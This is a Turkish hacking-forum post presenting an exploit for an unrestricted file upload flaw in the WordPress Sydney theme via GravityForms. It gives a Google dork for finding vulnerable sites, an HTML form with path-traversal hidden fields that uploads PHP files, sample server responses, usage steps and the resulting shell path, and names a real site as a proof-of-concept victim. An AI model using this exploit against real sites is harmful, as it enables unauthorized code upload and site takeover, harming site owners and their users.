Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress Theme Sydney by aThemes Input Exploiter
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,356 / 1,356
Deneyim: 24 / 100
Rep Sayısı: 2708
Mesaj Sayısı: 6103
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WordPress Theme Sydney by aThemes Input Exploiter
08.06.2018 14:52
################################################################################​#################

# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]

################################################################################​#################

# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''

# Exploit HTML Code :

<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>

<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.html" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

cyberizm

Exploit : TARGET/?gf_page=upload

We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter.

# Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

cyberizm

# Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

cyberizm

# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf

# You don't need to change your filename as _input__kingskrupellos.php5 like this.

# Just choose a file from your machine and upload it with the beforementioned extensions.

# For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5

# Example Usage for Windows :

# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP

# 127.0.0.1/athemeswordpressexploiter.html

# Path : TARGET/_input__kingskrupellos.php5

cyberizm

################################################################################​#################

# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.

cyberizm

Alinti



1 Ziyaretçi